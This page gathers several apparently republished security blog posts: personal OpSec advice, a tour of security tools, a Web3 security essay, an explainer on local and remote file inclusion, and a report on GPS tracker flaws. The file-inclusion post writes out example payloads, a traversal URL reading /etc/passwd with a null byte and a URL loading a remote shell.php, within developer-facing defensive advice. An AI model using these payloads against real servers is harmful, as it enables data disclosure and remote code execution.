Skip to content

OpSec or How to Behave When You Care About Your Behaviour

Intro

Alrighty! This one has long been on my to-do list! OpSec! Why, how, when, who… how much and how long… Let’s see! Let’s answer some questions. Whether you’re sleuthing for some OSINT investigation, or your country is blocking you from watching your favorite shows on Netflix, you need to figure out your specific OpSec needs, and behave accordingly.

This one is a particularly interesting topic, as it combines a lot of elements – from purely technical to some psychological/behavioural ones.

Before I go further into the topic, I would emphasize that this is my opinion. You can always argue the technicalities, sure, but the methodology is unique – as it should be – again, in my opinion. (Though in this article I am not discussing that many technical aspects)

This is quite logical, as we all have different needs, and are encapsulated within different contexts. What’s true in my case might not necessarily be true in yours. So, with that in mind one might ask – what’s there to learn, then? And it is a valid question! However, we’re interested in the approach here – which is also unique to each and every one of us.

My goal here is to help you be more involved in taking the control of your own privacy and having a healthier and safer online presence which surely accounts to a large portion of your life in general, as we’re all getting more and more dependent on myriad of online services.

Now that I’ve made the intro, and safely fenced off from the personal aspect involved in this topic – let us proceed.

Basics

At its core, OpSec is just managing risk. In the personal case (one I’m looking at), the risk comes from whatever you deem worthy of incorporating into your model. Thus, you’d also want to have a threat model – no need to go overboard here though. This is just meant in a context of you identifying what information you’d want to protect at all costs i.e., no leaks, or if there’s some that you might be fine with being discovered. I purposefully lead with the first sentence above, as you will probably encounter many definitions – but the bottom line is always about that I/O of your personal information. You want to control both I and O in the I/O, but you definitely have to focus on the O – in other words, your model and the way you conduct yourself should be in sync with what you’re trying to achieve. Again, based on the model.

You want to prioritize as well. Best practices are best practices for a reason but will deteriorate rapidly if applied blindly (without context to match). I debated with myself whether to include best practices at the end of this article and opted for it in the end. The argument against it was backed by the second sentence of this paragraph. I am counting on you here!

Traditionally, there are stages when it comes to OpSec (well, for 3 letter agencies and Military it really makes sense) and I will mention that here as well. However, I want to emphasize that I am doing that for the contextual and historical reasons, as well as for you to be more informed. In the end, though, you’re not required to draft any complex models based on the ones Military uses. Their threat model is surely different than yours, so their OpSec needs are too. The methodology/approach is what you should focus on. Thus, before taking any action first, take a pause and contemplate on it. The future you will be better off i.e., safer online.

Defining OpSec

Okay! I am now going to reference some definitions so you can see how that compares to what I’ve been trying to convey.

1 – (Published by Range Commanders Council, U.S. Army White Sands Missile Range – full .pdf document found here)

The OPSEC is a process of identifying, analyzing, and controlling critical information indicating friendly actions attendant to military tactics, techniques, and procedures (TTPs), capabilities, operations, and other activities to:

  • Identify actions that can be observed by adversarial intelligence systems.
  • Determine what indicators adversarial intelligence systems might obtain that could be interpreted or combined to derive critical information in time to be useful to adversaries.
  • Select and execute measures that eliminate or reduce to an acceptable level the vulnerabilities of friendly actions to adversary exploitation.

As you can see, this is very applicable for us as well! TTPs of the well-known ATPs are already documented by MITRE (since I am talking about the Cyber domain), and aside from the specific stuff regarding military operations, this definition seems quite solid!

To digress for a bit:

Unless you’re a CEO of large Enterprise that’s targeted by advanced threat actors, you might care more about the TTPs. In an average guy wants to prioritize his privacy online scenario those ‘TTPs’ are quite different in nature. However, the goal is the same – a script kiddie trying to mess something up for the fun of it might not invite ATP levels of controls, yet they can still devastate you. Take it all into account and assess critically. Start with the basics, and build from there, don’t go overboard just to get pwned by a newbie hacker that bought a phishing kit on the Darkweb.

Circling back to the definitions, let’s do one more:

2 – (Published by the Department of the Navy, US Marine Corps – the .pdf can be found here)

OPSEC is a capability that identifies and controls critical information and indicators of friendly force actions attendant to military operations, and incorporates countermeasures to reduce the risk of an adversary exploiting vulnerabilities. When effectively employed, it denies or mitigates an adversary’s ability to compromise or interrupt a mission, operation, or activity. Without a coordinated effort to maintain the essential secrecy of plans and operations, our enemies can forecast, frustrate, or defeat major military operations. Well-executed OPSEC helps to blind our enemies, forcing them to make decisions with insufficient information.

This is it …a capability that identifies and controls critical information… and incorporates countermeasures to reduce the risk of an adversary exploiting vulnerabilities…

As you can see the proactive nature is what lies at the heart of OpSec. You taking into account stuff that could compromise your vulnerabilities and drafting a plan to mitigate that before it occurs. There is no reactive OpSec! At that point, you’ve already been pwned, and depending on the criticality of the breach you’re in some (deep) trouble. This also means that one misstep in your (not so) robust model is enough to take it all down. And it makes sense – a hacker just needs to find one way in and they’re off to the races!

Stages of OpSec – OpSec process

Using our US Navy document, we found this neat little graphical representation of OpSec stages

From 1. to 5. you’d have:

  1. Identification of critical information
  2. Analysis of threats
  3. Analysis of vulnerabilities
  4. Assessing the risk
  5. Applying countermeasures

This is also what you’d get if you Googled for “OpSec stages.”

However, it might be hard(er) for you to analyse threats – as you’re just a civilian, so you’re not really the target, but you still can end up being a target. Just some more food for thought.

(Also, note that the process is circular)

Anonymity vs Privacy

This is the hot stuff right here! VPNs are there for your privacy not anonymity. That’s what TOR is all about. You need to understand this distinction.

The idea is that privacy is you keeping some things for yourself, and this can include your actions. On the flipside, anonymity is supposed to keep your identity private, but not your actions.

This is a very, very, brief overview, but it’s a start. Check out this blog for a bit more information on these two terms. Or this one.

Good (best?) practices

It’s a bit unrewarding to say best practices which is why I purposefully added good to the title. Let’s review some:

  • Don’t talk openly (about your ‘mission’ critical stuff) – Duh!
  • Don’t operate from home – If you intend on doing anything that needs to keep that level of separation from your real persona. If you’re just trying to do normal stuff where that’s a non-issue, then you can adjust accordingly. (I am not trying to help you operate a botnet, also, those guys already know this stuff.)
  • Encrypt everything – this is a great one, though, again, it might not be necessary in your case. You might want to encrypt and safely store only the most critical data. Also, this does require a fair bit of technical knowledge.
  • Create personas – This is the anonymity part. If you really need to do something but it is not a great idea to do as ‘you,’ create another persona and be them. Great example of this are sock puppets, or something like OSINT CTFs I like to participate in.
  • Don’t contaminate – This one ties to the previous one. If you have personas, don’t cross-contaminate them, as in this case they are actually working against you, and you’d be better off just using other controls to protect the real you. It can backfire. Significantly.
  • Don’t trust – I mean… you’re on the Internet after all, adopt a healthy amount of paranoia if you haven’t already.
  • Be paranoid – See the previous one. Even if nobody’s out to get you personally, that doesn’t mean that they’re not out to get you. That’s just the Internet for you.
  • Don’t give people power over you – Just don’t. Don’t overshare, be careful. Anything you say can and will be used against you is very, very, true in this context as well.

Technical good (best?) practices

  • Don’t be the only guy using TOR on a network that’s monitored. It’s how they caught this guy.
  • Don’t do stuff on your own infrastructure that might get you in trouble
  • VPN provides privacy! Not anonymity
  • Isolate/segment your environment if there’s a need – I’m thinking VMWare, VirtualBox, etc.
  • Check for DNS leaks
  • If your use case is such, use Tails/Qubes OS/Whoonix
  • Strong passwords! (And a password manager – I prefer KeePass, as it keeps the stuff locally and you can add more functionality through plugins, such as 2FA)
  • Encrypt your disk, encrypt important stuff – where needed
  • Protect yourself against WebRTC leaks
  • Educate yourself on browser fingerprinting – there’s a lot of stuff online (as well as right here on Vsociety!) There’s this article, too.

Conclusion

I am hoping I’ve piqued your interest with all this OpSec talk. It might seem like an overkill to someone who’s maybe coming from a different field, but I assure you it is not! The Internet is a hostile place, and in a hostile environment you’d act accordingly, right? If you’re on vacation in, let’s say, a gorgeous but realistically dangerous place like some cities in Latin America, you would be careful. Do the same when online. Know where you’re threading, and act accordingly.

This is all for now! I hope I’ve made a decent introduction for some of the upcoming articles that will focus on the Darkweb, all the while bringing this fascinating topic closer to you. Stay tuned!

 
Some additional cool stuff to check out

https://www.youtube.com/watch?v=zXmZnU2GdVk

https://www.youtube.com/watch?v=8u7yyFYvzC4

https://www.youtube.com/watch?v=9XaYdCdwiWU

https://www.youtube.com/watch?v=eQ2OZKitRwc

Cover image by ueberform

#opsec #privacy #anonymity #best-practices #vicarius_blog

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Security Tools – Pt. 1

Intro

On first glance, the collection of tools that I chose for this article might seem all over the place. However, the idea behind this article is to talk more about some of the most important and well-known tools in the Infosec space.

Thus, I talk about Volatility (DFIR tool) and Metasploit (exploitation and exploit development) as well as Yara(Malware research & analysis) MITRE(Threat Intel knowledge base) and Sysmon(Advanced logging tool, that we can also use to hunt for threats).

Volatility

Volatility is a memory forensics tool, developed by Volatility labs. It is a standard tool in virtually every Incident Responder’s/Blue Teamer’s toolkit, it can be easily expanded through a bunch of plugins that are available, and, most importantly, it is completely free.

There are many ways to acquire memory captures from a system, and we won’t go into that. We’ll just mention that the tools would differ depending on our system’s state (on/off). For example, for offline systems, specifically Windows OS, we can do this through the hiberfil.sys which is located in %SystemDrive%if the disks are unencrypted.

This file is the compressed image of the previous boot, but that doesn’t mean we can’t do some forensics on it!

Notice I am using volatility standalone (because I am running Window/CMD in the image) otherwise the command would just be volatility.

Imageinfo is the command that gives the profile on which we can work. You need to identify the right one.

Further, we can look for hidden processes with psxview, we can use ldrmodules if we need more details – it will show inMem, inInit, inLoad (if they are False)and all of these are quite bad as they indicate that module has been injected. Injected code is obviously very bad and we can look for it with malfind, and even dump it to a file.

Also, some of the usual hypervisor formats are:

  • .vmem – Vmware
  • .mem – Parallels
  • .sav – VirtualBox

Generally, the most common format is .raw – raw files are collections of unaltered, unprocessed data.

Further, we might want to check see what the community says about these processes and upload the dumps to VirusTotal.

MITRE ATT&CK

MITRE ATT&CK is a global knowledge base, which documents adversary TTP’s (Tactics, Techniques, and Procedures). Their mission is to enable better Cybersecurity by connecting communities together. The framework, which is used for Threat Modelling is free, open, and available to anyone. If your role has anything to do with Cybersecurity – from SOC Analyst, to a Red Team Operator, or Pentester, you should know your MITRE ATT&CK.

ATT&CK® Navigator is a great place to start, and there you can see different matrices, from Enterprise to Mobile and ICS. They all describe how adversaries reach their goals, and what specific actions they might take for the said goals to be obtained. For example, they might deploy Rootkits if the goal is to evade your systems and hide their malicious activity.

Yara

Yara, or Yet another ridiculous acronym is a tool used for malware detection and research. You can find much more about Yara here, and here.

A quote from VirusTotal is truly revealing of what kind of importance Yara holds in the Cybersecurity community today:

“The pattern matching swiss knife for malware researchers (and everyone else).”

Yara works by identifying binary as well as text patterns (strings contained in a file, etc.)

To detect those patterns, Yara uses rules, which you can think of as labels that we can write if we want to determine maliciousness of a file. Applications can use strings to store text data, and that string can be a Bitcoin address stored as a string inside some Ransomware.

Yara rules are easy to read and understand, and were made to resemble C. We are not going into details as to how you would create your Yara rules, instead, you can check out this awesome article by an Infosec Researcher named fr0gger_, where you can find out more by looking at his Anatomy of a Yara rule infographic.

Also, if you find this tool awesome (as we do!) and decide to follow down the path, be sure not to miss

Valhalla – an online Yara rule feed, made by Nextron-Systems.

Metasploit

Metasploit is the biggest and most well-known Exploitation framework. There are two versions, the paid one having a GUI – its called Metasploit Pro, and the free version being CLI-based.

Metasploit framework is basically a bundle of tools which can do scanning, exploitation, post-exploitation, exploit development, and more. Even though its mainly geared for Pentesters, it is invaluable for Exploit Developers.

The main components of Metasploit are: Modules, msfconsole, and standalone tools. The msfconsole is your CLI interface, modules are there to support your various exploits, payloads, and more… and your standalone tools can help you with exploit development, as well as with pentesting.

Sysinternals

Sysinternals is a tool, rather, a collection of (70+) tools, that were created by Mark Russinovich, way back in the 90’s by him and Bryce Cogswell under the name of a software company called Wininternals – where he was a co-founder. In 2006 Microsoft acquired his company, and Mark Russinovich started working for Microsoft. Currently, he is the CTO of Microsoft Azure.

The Sysinternals suite is used literally by everyone. From seasoned IT veterans like Sysadmins and the like, to Red Teamers and even adversaries! And this is no surprise, since in the 70ish tools that come with the Sysinternals Suite you are covered on many, many fronts, such as: system information, security utilites, process utilites, networking utilities, and more.

These tools are real, and you should really learn to use them if you’re working in IT, it shouldn’t matter if you’re a Support Engineer, or a Security Engineer, Sysinternals is a must. (We will briefly look into one of those below – Sysmon)

Sysmon

Sysmon is a tool for logging and monitoring events on Windows machines. It is also a part of the Windows Sysinternals Suite (which is now also available in Microsoft Store – though originally made by Mark Russinovich). You can think of Sysmon as a Windows Event Log viewer on steroids. Similar to Process Explorer from the Sysinternals Suite and the in-built Task Manager.

Sysmon collects detailed logs, and even traces events – which can help with pinpointing abnormalities in your environment. Ideally, you would use Sysmon in conjunction with a SIEM (System Information and Event Management tool – most known example being Splunk) which can further parse the logs, and provide even more insight about your systems and the potential abnormal behavior.

Sysmon requires a config to work, so you can either create, or download a config. With this, you can fine tune what you would like to log.

With Sysmon you can filter the events, in order to reduce clutter and further hunt for threats, malware, persistence, even evasion techniques. You can also detect Mimikatz – one of the most used Windows post-exploitation tools, for dumping credentials from memory; and Metasploit – which needs no introduction – too.

Mimikatz signature might be well known and an Antivirus will pick it up, but your adversary can obfuscate this, thus rendering the AV useless. The idea is to use a config that will help us focus on hunting the threat. On MITRE, we can find Mimikatz activity documented here. Information on hunting Metasploit (and more – PsExec, netstat, net, etc.) can be found here.

These are some extremely powerful features to have, and also it goes to show we don’t need to break our bank to protect our systems, there’s a plethora of tools out there that have much to offer. Just like Sysmon.

Conclusion

My ideal audience for this article are people newer to the Infosec field, who are naturally curious and hungry for knowledge.

However, I hope that there’s some interesting bits and pieces of info even for some of the more experienced Cybersecurity practitioners – there also might be a link or two above that you find interesting.

Stay tuned for Part 2!

#MITRE #yara #volatility #sysinternals #tooling

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Blockchain Security — The New Threat. Part 1.

A new threat is on the horizon.

And this new paradigm promises to be the most profound shift for security professionals since the dot-com boom of the nineties.

I’m talking about blockchains and decentralized economies in the 2020s

To get a sense for the scope of change in front of us, we need to take a trip down memory lane – to the advent of the internet.

During its infancy, the original internet was designed to be decentralized. With today’s tech giants looming large over every part of the internet, that’s kind of hard to believe. But it’s true. In the early days, the internet had a very practical purpose – to withstand a nuclear blast. Think about it: A network of computers all talking to each other from around the country do not have a single point of failure.

This decentralization turned to centralization as the 1990s went on. While your average internet user could, in theory, create their own webpage, most were bystanders who viewed already-made webpages instead. And while, in theory, you could still create your own email server today, the truth is that it’s a lot easier to just use Gmail. Hence the moving of the goal post ever so gradually toward centralization.

As the economy recovered from the wreckage of the dot-com boom and bust, the world embraced the internet and the economy huddled around Big Tech companies who successfully carved out their corner of the internet. Such as:

  • Microsoft and its Windows operating system.
  • Google and its search engine.
  • Facebook and its social network.

The rise of these internet startups brought with them a new threat, and online security exploded.

Before Web 2.0 – the web we use today — thousands of users and businesses logged onto the first iteration of the web, wholly unaware of the tenuous security landscape.

Early antivirus software emerged, but its signature-based system produced false positives too often to be reliable.

Malware exploded from tens of thousands in the early nineties to more than 5 million by 2007. And, by the mid-nineties, it became clear that cybersecurity was needed on a scale never seen before. This gave rise to heuristic detection to cope with the influx of new threats.

As we move into the next iteration of the web – Web3 – we are on the cusp of another generational expansion — the expansion into cryptocurrencies and the blockchain revolution. And the similarities to the dot-com boom are uncanny.

In each era, you have a new tech with limitless potential that very few folks truly understand. You have thousands of companies popping up hoping to commercialize that new tech with crazy new ideas and a ton of money flowing into the space.

Most of the dot-com startups that sprouted up in the late 1990s were bankrupt by 2003. And many of the biggest companies during the internet bubble – companies like Cisco and Intel – have, indeed, gone on to change the world. Cryptocurrencies seem to be on the same trajectory, and they will likely change the landscape over the next two decades… for better or worse.

The Promise of Blockchain and Web3

For the hardcore Web3 proponent, the third coming of the internet is strictly about decentralization

The internet has come a long way since its inception. We’ve gone from a static, text-based web to a dynamic, multimedia one. But as the web has evolved, so too have the threats that emerge to exploit it.

In the early days of the internet, we used simple text-based interfaces to navigate the web. This was fine for basic information retrieval, but it quickly became clear that this approach was not going to be sufficient for the increasingly complex tasks we wanted to do online.

So, we developed graphical user interfaces (GUIs), making it possible to interact with the web in a more intuitive way. With a GUI, you could point and click your way around the internet, and even manipulate data in a more natural way.

Today, we want to do more than just retrieve information or buy products – we want to be able to interact with others, create and share content, and even earn money online. And we want to do it without compromising our security.

That’s the big promise of Web3 and blockchain.

Web3 is the next evolution of the internet, one that puts users first by giving them control over their own data and identity. With Web3, you can do all the things you’re used to doing online, but without having to give up your privacy or hand over your personal data to Big Tech companies.

Instead of being controlled by a few large corporations, Web3 is powered by the collective effort of its users. And because it’s based on decentralized technologies, Web3 is more resilient to censorship and shutdowns than the current internet.

Allegedly.

To understand Web3, we need to look at blockchain.

Thanks to Bitcoin and Ethereum — two of the world’s stalwart cryptocurrencies – “blockchain” has become a household term.

When Bitcoin first came on the scene, its promise was one of pure decentralization – send money without the need for profit-grabbing middlemen at the banks and keep everyone in check with digital incentives rather than regulations.

This technology has the potential to revolutionize how we create, store, and manage data. As such, with blockchain powering the next iteration of the internet, we’re on the precipice of a new internet that is –in theory – more secure, efficient, and transparent.

Why?

Well, at its core, blockchain is a decentralized ledger. It records transactions without the need for a central authority to update it. This ledger enables innately untrustworthy individuals and entities to collectively create trustworthy systems, without the need for any central authority – hence the term “disintermediation.”

Blockchain enables humans to remove the middleman from legacy systems and replace them with a collective ledger. By removing and replacing them with an automated and incorruptible technology, we can make today’s systems and processes more trustworthy, faster, and cheaper.

The applications here are theoretically infinite.

Even Visa, the legacy payments giant, is integrating blockchain technology.

Visa’s executives are betting on decentralized finance and blockchain as the future, and as such, as a major threat to payments business. To stay ahead of the curve, Visa’s R&D teams are creating their own blockchain interoperability hub, which promises to connect different blockchain networks into a single channel. This would facilitate the transfer of digital assets between different blockchains.

These isn’t an inconsequential idea. Interoperability in the blockchain world introduces a slew of security challenges, as this idea is critical to Web3 which aims to apply the main concepts from the blockchain to all aspects of your digital identity and life.

We can’t ignore the security “gaps” within the promise of blockchain decentralization. And these gaps become will become wider as more blockchains are created and interact with one another.

We’ll explore these threats in detail in Part 2.

#vicarius_blog #blockchain

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

File Inclusion Vulnerabilities (LFI and RFI)

There are two types of File Inclusion Vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

These inclusion vulnerabilities are very similar to Directory Traversal attack. I will explain more regarding the differences in the section below.

To perform this attack, the attacker needs to target an application with file saving logic and logic for retrieving files in UI. The logic for saving the file is crucial because that can be a way to access the target server files and then include it in the script from your machine. In theory, the logic for retrieving the file in UI is not crucial to perform this attack. Still, it is very important because the attacker can intercept the request, investigate, and check which information can be helpful for him to perform the attack. 

We will manipulate the parameter in URL, as we did before in one of the articles when explaining the Directory Traversal attack. 

LFI loads local files such as “etc/passwd,” but then, on the flip side, RFI can load from an external source outside the server.

*Why will you always find examples of these attacks using this plain text file “passwd”?

This file is handy cause it contains information such as the list of registered users (id, group id, home directory, etc.) And it can be accessed because it has read permission with the ability to map user ids to users’ names.

Difference between Directory Traversal and File Inclusion Vulnerabilities

In the Directory Traversal article, I gave simple examples of this attack and some prevention tricks you can use with JS, Angular, or C# libraries.

File Inclusion and Directory Traversal look very similar, but they have one huge difference: the possibility of executing files within the attack.

File inclusion vulnerabilities allow you to load and execute a file in the application. On the other hand, performing a directory traversal attack file is just reading the files.

I will give an example after in the text, but here I am just going to explain one case scenario so you can better understand:

In the application, we can browse to the file and save it. After investigating the GET request when returning the file, we see that the URL will be changed because it would contain the name of the file in it. That means we can manipulate the name and save it as a file path to a specific target file in our machine. That file can be .txt, PowerShell (.ps1), etc. The file will probably contain a script with malicious code, which will then be executed on the target server. That is an example of a Remote File Inclusion attack!

How to test if your application has File Inclusion Vulnerabilities?

It is essential to test the code while developing. In this case, the developer needs to test it by himself, not just using some of the tools I mentioned in the Directory Traversal article. Also, I think it is important to see if the attacker can access folders and files. Also, even if folders are restricted using permissions, the developer should test out if it can be easily bypassed.

Summary:

First step: While preventing this attack, you should know if your application gives you the possibility to access files (if it has file inclusion vulnerabilities)

Second step: Check if the attacker can access the file even with folder/file permissions.

Examples of Local File Inclusion

For example, we have an application that uses this input field to enter the file’s name, and by clicking on the Include button, the file will be uploaded.

When you successfully upload the file, and you preview it, the URL will change to this:

http://test.com/testController?file=test.php

The attacker starts by exploring how the code is written to understand the used logic and find information where the file is saved. 

We can start with “making a mistake” when trying to import a file because some warning or error would occur. When a warning or error occurs, that is often done by the response of an HTTP request. Each HTTP request is visible in Development Tools, and you can see the header, body, URL which hits, etc. The body is used when you send a payload; for example, this file we are trying to upload.

Then easily, you can check out the structure of the payload or what the API is expecting, so if you want to replace the structure with a malicious one, you will know how it will pass. 

*Note: You probably know that the structure of the object you are sending to API from UI needs to be the same as the object that API expects. If not, the mapping would not be successful, and you will not hit even the controller in API.

So, you first want to mistake and analyze what is returned error/warning message. 

As you can guess, we need to focus on error/warning messages.

We should try to catch all the exceptions and make them custom with some user-friendly message. With that implemented, you should avoid sending some information that would uncover sensitive information with the API. For example, which method is used, what is expected, file path, etc.

In one of the examples I found on the internet, I saw that even this message can be retrieved:

What information this warning message uncovers?

First, this is a PHP application that uses using include method. As stated on site W3Schools“The include (or require) statement takes all the text/code/markup that exists in the specified file and copies it into the file that uses the include statement.”

This method tries copying some file with the name hi and giving it the extension “php.” File location is also visible: “/var/www/html”.

So, as you see, this warning uncovers so much information: 

  • used method, so we know the logic of the application
  • we need to bypass adding the extension 
  • file path, so we know how many “../” we will use or how we will “walk” through the folders. You probably already guess that in this stage, we can use the Directory Traversal technique “../”.

What would the attacker use if we would like to manipulate and check out registered users in etc/passwd

http://test.com/testController?file=../../../../etc/passwd%00

%00 – null byte would be used for ignoring all characters after null byte, including extension.

If this passed successfully and passwd doesn’t have restricted permissions, the content would be readable, but if permissions are there, that is our next focus.

It is great that we didn’t forget to add permissions to files containing sensitive data, but it is very important to try to avoid permissions and see how safely we implemented them.

To test that, we could create test requests with Burp Suite or maybe use CURL, or Postman.

We should pay attention to testing credentials or cookies because sensitive data can be manipulated there.

In one of the following articles, I will cover best practices for implementing good credential and session management to avoid a problem with broken authentication. 

Examples of Remote File Inclusion

For this type of attack, we will save the file name that would be the file path to some malicious script on the attacker server.

This would be an example of a URL that targets malicious script on some domain.com site:

http://test.com/testController?file=http://domain.com/shell.php

So, this will save the path, and when the path is called, it will execute shell.php – a malicious script in which some code targets the system to extract some data. 

*Focus on validating inputs in UI, so the malicious input parameters don’t even get to the API!

Important reminder for using trusted third-party libraries for validation

If you check out the logic in libraries, you can see how to expand it to cover some specific cases for your application.

Modification can be done by creating a wrapper over the libraries class or even making some script with an extended logic.

Also, always check and upgrade the version of third-party libraries!

Conclusion

Prevention is very important to avoid these vulnerabilities, but testing is equally important.

If you are a software developer, you know that to be a good developer, you must also have developed testing skills as much as coding skills.

You should use all available tools to screen these types of vulnerabilities but remember that you should trust your knowledge the most!

Don’t forget to give the code to testers because the person writing the code can often overlook some cases. Mostly because while coding and trying to write secure code, they might assume that the attacker will attack in a certain way.

If you are a developer, the best practice is to always be familiar with new attack techniques.

In the end, secure code is the cheapest code!

#LFI #RFI #vicarius_blog

Cover photo by Kevin Ku

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Could Hackers Drive Your Car Off a Bridge?

What if hackers took control of your car? This hypothetical has been floating around for decades as an illustrative example of what could happen when cyber attacks bleed into the physical world. The idea of being behind the wheel yet totally at the mercy of an invisible, malicious driver is terrifying to say the least. So I have some bad news: the hypothetical has become a reality.

Major Flaws Found in Popular Auto Tech

I am not the first person to observe that today’s cars are essentially computers on wheels. Highly digital and internet-connected, cars work basically like any other IT asset – except for the fact that they weigh a ton and go 100 miles per hour.

As cars have become increasingly digital, an aftermarket has developed for automotive tech that supplements the systems built into the car to increase performance, comfort, etc. GPS trackers are one example. Popular on fleet vehicles, GPS trackers record and report a vehicle’s location and, to varying degrees, control what the vehicle can do.

Cybersecurity researchers at BitSight recently evaluated one of these trackers: the MiCODUS MV720. They discovered significant security flaws. I will cover those in a second. But first, consider the potential risks of those flaws, as highlighted by the researchers:

  • Injury or loss of life
  • National security breaches
  • Property damage
  • Supply chain disruptions
  • Individual or fleet-wide ransomware
  • Surveillance and tracking

Any (or all) of these scenarios are possible because the flaws the researchers discovered allow hackers to gain administrative privileges over the trackers. Those privileges let them track vehicle locations (for who knows what nefarious purpose). Worse, these trackers give administrators the ability to disable the engine at will.

Hackers may not be able to drive the car off a bridge. But they can still cause ample chaos, put lots of lives at risk, and bring down an entire vehicle fleet all at once.

Eager to emphasize how alarming these flaws are, the researchers propose several possible exploits. Hackers could disable emergency vehicles en mass so that police and fire can’t respond. They could monitor when a vehicle is on a busy highway and cut power suddenly to cause a multi-car pileup. They could use tracking capabilities to surreptitiously spy on someone everywhere they go. Or they could disable a vehicle and demand a ransom to restore access. Unfortunately, this list barely begins to cover all that could go wrong when vehicles are a tool of cyber attacks.

Where Researchers Found Flaws

The six flaws found in the GPS trackers are worth reviewing for what they reveal about the flaws lurking in insecure connected devices (automotive or otherwise) and the tactics hackers use to exploit them:

  • Hardcoded Password – Using a master password lets unauthenticated users take control of any tracker.
  • Broker Authentication – Authentication issues let hackers exploit the API server to launch a man-in-the-middle attack.
  • Default Password – Weak default passwords (123456) combined with no prompt or requirement to change them leave devices vulnerable.
  • Reflected XSS – Taking control of a script in the victim’s browser gives the perpetrator the same data and permissions the exploited user has.
  • 2 Insecure Direct Object References – Two different flaws in the web server permit hackers to alter and access information without authentication.

Perhaps more alarming than the flaws themselves is MiCODUS’ reaction when confronted with them: complete silence. Researchers made multiple attempts to share their findings with the developer, but all of those efforts were rebuffed, so they went to the Cybersecurity and Infrastructure Security Agency (CISA), but they have also been unsuccessful at engaging the vendor.

It’s one thing to sell insecure devices. It’s another thing to ignore those flaws – especially when the consequences are so severe.

The Frightening Evolution of Cyber Risk

We can draw lots of conclusions from this incident, about the pervasive vulnerability of connected devices, about the egregious disregard of developers, and about the unforeseen consequences of digitization.

But what jumps out to me about this story is what it says about the evolution of cyber risk. This is just one of several recent examples of cyber attacks putting human health and safety in danger. The stakes in cybersecurity are suddenly much higher. And escalating faster than ever given the recent rise of ransomware and state-sponsored hacking. To me, this looks like the trajectory of cyber risk taking a sharp turn upwards and moving into unprecedented territory. Which is all to say, if the flaws in the GPS tracker seem bad, just wait until these flaws exist in every part of the built world. Will anything be safe?

I have my own complicated opinions, but I’m eager to hear yours. What do you think are the new frontiers of cyber risk? Can we make these risks manageable, and how? When will we start to see automotive cyber attacks become commonplace?

Admittedly, I don’t have good answers to all these questions. But if we aren’t asking them, we are doing the same thing as MiCODUS: turning a blind eye to a problem staring us directly in the face.

#blog #cybersecurity #automotive #IoT #CISA #vicarius_blog

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

×